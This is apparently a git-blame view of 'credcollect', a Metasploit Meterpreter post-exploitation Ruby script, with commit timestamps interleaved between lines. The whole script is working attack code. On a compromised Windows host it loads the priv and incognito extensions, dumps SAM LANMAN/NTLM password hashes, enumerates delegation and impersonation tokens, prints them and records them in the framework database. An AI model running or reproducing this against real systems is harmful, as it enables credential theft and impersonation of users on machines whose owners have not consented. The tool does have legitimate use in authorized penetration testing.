2009-10-26 15:14:28 +00:00
|
|
|
# $Id$
|
2009-03-28 07:44:44 +00:00
|
|
|
# credcollect - tebo[at]attackresearch.com
|
|
|
|
|
2009-11-05 00:38:05 +00:00
|
|
|
opts = Rex::Parser::Arguments.new(
|
2010-08-18 19:18:27 +00:00
|
|
|
"-h" => [ false,"Help menu." ],
|
|
|
|
"-p" => [ true,"The SMB port used to associate credentials."]
|
2009-10-25 19:52:40 +00:00
|
|
|
)
|
|
|
|
|
2010-08-18 19:18:27 +00:00
|
|
|
smb_port = 445
|
|
|
|
|
2009-11-05 00:38:05 +00:00
|
|
|
opts.parse(args) { |opt, idx, val|
|
2009-10-25 19:52:40 +00:00
|
|
|
case opt
|
|
|
|
when "-h"
|
|
|
|
print_line("CredCollect -- harvest credentials found on the host and store them in the database")
|
|
|
|
print_line("USAGE: run credcollect")
|
2009-11-05 00:38:05 +00:00
|
|
|
print_line(opts.usage)
|
2009-10-25 20:57:23 +00:00
|
|
|
raise Rex::Script::Completed
|
2010-08-18 19:18:27 +00:00
|
|
|
when "-p" # This ought to read from the exploit's datastore.
|
|
|
|
smb_port = val.to_i
|
2009-10-25 19:52:40 +00:00
|
|
|
end
|
|
|
|
}
|
|
|
|
|
2010-09-09 16:09:27 +00:00
|
|
|
if client.platform =~ /win32|win64/
|
|
|
|
# Collect even without a database to store them.
|
|
|
|
if client.framework.db.active
|
|
|
|
db_ok = true
|
|
|
|
else
|
|
|
|
db_ok = false
|
|
|
|
end
|
2009-10-25 19:52:40 +00:00
|
|
|
|
|
|
|
|
2010-09-09 16:09:27 +00:00
|
|
|
# Make sure we're rockin Priv and Incognito
|
|
|
|
client.core.use("priv") if not client.respond_to?("priv")
|
|
|
|
client.core.use("incognito") if not client.respond_to?("incognito")
|
2009-03-28 07:44:44 +00:00
|
|
|
|
2010-09-09 16:09:27 +00:00
|
|
|
# It wasn't me mom! Stinko did it!
|
|
|
|
hashes = client.priv.sam_hashes
|
2009-03-28 07:44:44 +00:00
|
|
|
|
2010-09-09 16:09:27 +00:00
|
|
|
# Target infos for the db record
|
|
|
|
addr = client.sock.peerhost
|
|
|
|
# client.framework.db.report_host(:host => addr, :state => Msf::HostState::Alive)
|
2010-01-22 23:53:12 +00:00
|
|
|
|
2010-09-09 16:09:27 +00:00
|
|
|
# Record hashes to the running db instance
|
|
|
|
print_good "Collecting hashes..."
|
|
|
|
hashes.each do |hash|
|
|
|
|
data = {}
|
|
|
|
data[:host] = addr
|
|
|
|
data[:port] = smb_port
|
|
|
|
data[:sname] = 'smb'
|
|
|
|
data[:user] = hash.user_name
|
|
|
|
data[:pass] = hash.lanman + ":" + hash.ntlm
|
|
|
|
data[:type] = "smb_hash"
|
|
|
|
data[:active] = true
|
2010-01-22 23:53:12 +00:00
|
|
|
|
2010-09-09 16:09:27 +00:00
|
|
|
print_line " Extracted: #{data[:user]}:#{data[:pass]}"
|
|
|
|
client.framework.db.report_auth_info(data) if db_ok
|
|
|
|
end
|
2009-03-28 07:44:44 +00:00
|
|
|
|
2010-09-09 16:09:27 +00:00
|
|
|
# Record user tokens
|
|
|
|
tokens = client.incognito.incognito_list_tokens(0)
|
|
|
|
raise Rex::Script::Completed if not tokens
|
2009-12-28 14:38:25 +00:00
|
|
|
|
2010-09-09 16:09:27 +00:00
|
|
|
# Meh, tokens come to us as a formatted string
|
|
|
|
print_good "Collecting tokens..."
|
|
|
|
(tokens["delegation"] + tokens["impersonation"]).split("\n").each do |token|
|
|
|
|
data = {}
|
|
|
|
data[:host] = addr
|
|
|
|
data[:type] = 'smb_token'
|
|
|
|
data[:data] = token
|
|
|
|
data[:update] = :unique_data
|
2010-01-22 23:53:12 +00:00
|
|
|
|
2010-09-09 16:09:27 +00:00
|
|
|
print_line " #{data[:data]}"
|
|
|
|
client.framework.db.report_note(data) if db_ok
|
|
|
|
end
|
|
|
|
raise Rex::Script::Completed
|
|
|
|
else
|
|
|
|
print_error("This version of Meterpreter is not supported with this Script!")
|
|
|
|
raise Rex::Script::Completed
|
2009-03-28 07:44:44 +00:00
|
|
|
end
|